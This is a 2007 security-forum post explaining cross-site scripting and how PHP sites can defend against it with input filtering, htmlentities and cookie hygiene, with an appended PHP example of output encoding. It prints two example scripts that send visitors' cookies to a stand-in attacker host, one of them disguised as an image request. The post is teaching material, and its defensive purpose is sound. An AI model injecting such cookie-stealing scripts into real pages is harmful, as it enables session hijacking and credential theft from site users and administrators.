Darksat IT Security Forums
Basic PHP Script Security

Author Topic: Basic PHP Script Security  (Read 7792 times)
Darksat
« on: April 26, 2007, 06:18:22 pm »
XSS Attacks


XSS, or Cross Site Scripting attacks, are attacks aimed at identity theft and stealing passwords from the users of a website (and sometimes more). XSS attacks do not directly threaten the database the way SQL injections do, but they threaten all users, especially admins who have high privileges in operating a website.

A Cross Site Scripting attack consists of inserting code, usually Javascript, into any content that will be presented to users, such as blogs, forums, comments, etc. By inserting such malicious Javascript code, attackers can effectively "hijack" the user's browser and perform an attack, usually without the user's knowledge.

Most often, XSS attacks steal data from cookies. A valid browser, with a properly set cookie, will send the cookie only to the domain from which it was set. Combine this with the fact that cookies are used to pass user authentication data, sometimes even passwords, and especially session data. Therefore Javascript is used to fetch the local cookies for the domain in question and send them to a third-party domain (the attacker's domain), where the attacker can read their contents.

For example, an XSS attack can insert the following code inside a forum post or blog comment. It will not be visible to users (unless they look at the page source):


Code:

<script>
    document.location = 'http://attackers.domain.com/somescript.php?cookies=' + document.cookie;
</script>

Now, let's see what happens here. The script routes your browser to the attacker's domain, and in the URL request passes local cookie data to a remote script on the attacker's server. The script receives the cookie data, and the attacker can view its contents.

Of course, the above example is visible, since your browser is suddenly directed to a third-party website. However, a clever attacker can wrap the URL request inside an <img> tag; the remote (attacker's) server will return a valid image, but will also receive the cookie data in the image request:

Code:

<script>
    document.getElementById('some_div').innerHTML = '<img src="http://attackers.domain.com/somescript.php?cookies=' + document.cookie + '" />';
</script>

And there you go, the user's cookie data is sent to the attacker. Now, if the user is an admin, and the cookies contained session data and/or passwords or usernames, a great deal of damage can be done if the attacker gets hold of the admin's password.

In order to protect your site against XSS attacks, you need to filter all input. Wherever there is some string data that will be presented back to users (usernames, forum posts, blog posts, comments, etc.) you need to filter that data. The simplest filtering against XSS is to encode all HTML entities, where < becomes &lt; and > becomes &gt;, so browsers will not parse any tags inside them as valid HTML tags that could enable Javascript. PHP has one very useful little function for that, namely htmlentities().

More complex filtering involves dealing with character-encoding tricks, pre-escaped characters that revert to HTML tags after additional escaping, writing routines that seek out malicious script combinations, etc.

In addition to input filtering, make sure your cookies do not carry any sensitive data, like passwords or usernames.

As a test, to check whether your filtering is moderately sufficient, try to insert something like this:

Code:

<script>
  alert("This is XSS!");
</script>
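As an added example (not code from the original post), here is the filtering step the post describes, written in PHP: an unsafe echo of a comment beside its entity-encoded form, run against the post's own probe payload. The cookie function goes beyond the post by setting the HttpOnly flag; all function names and the sample inputs are my own.

```php
<?php
// Added example, not code from the original post: the output-encoding step the
// post recommends, shown beside the unsafe echo it replaces. Inputs are constructed.

// Encode every character that has meaning in HTML. ENT_QUOTES also turns ' and "
// into entities, which matters when the value ends up inside an attribute; the
// explicit UTF-8 charset closes off the character-encoding tricks the post mentions.
function encodeForHtml(string $untrusted): string
{
    return htmlentities($untrusted, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Unsafe: the comment is echoed verbatim, so a <script> payload runs in every
// visitor's browser.
function renderCommentUnsafe(string $comment): string
{
    return '<div class="comment">' . $comment . '</div>';
}

// Safe: the browser displays the payload as text instead of parsing it.
function renderCommentSafe(string $comment): string
{
    return '<div class="comment">' . encodeForHtml($comment) . '</div>';
}

// Beyond the post: an HttpOnly cookie is not readable from document.cookie, so the
// exfiltration scripts above get nothing even if a payload does run.
// Must be called before any output is sent (hypothetical cookie name "sid").
function setSessionCookie(string $id): bool
{
    return setcookie('sid', $id, [
        'httponly' => true, 'secure' => true, 'samesite' => 'Lax', 'path' => '/',
    ]);
}

// Constructed inputs: a benign comment and the post's own XSS probe.
$samples = [
    'Nice article, thanks!',
    '<script>alert("This is XSS!");</script>',
];

foreach ($samples as $input) {
    $encoded = encodeForHtml($input);
    // Self-check: nothing the browser could treat as markup survives encoding.
    if (preg_match('/[<>"\']/', $encoded)) {
        throw new RuntimeException("encoding failed for: $input");
    }
    echo "unsafe: " . renderCommentUnsafe($input) . "\n";
    echo "safe  : " . renderCommentSafe($input) . "\n\n";
}
```

The "safe" line for the probe shows &lt;script&gt; in the page source, which is what you should see when you run the post's test against your own filtering.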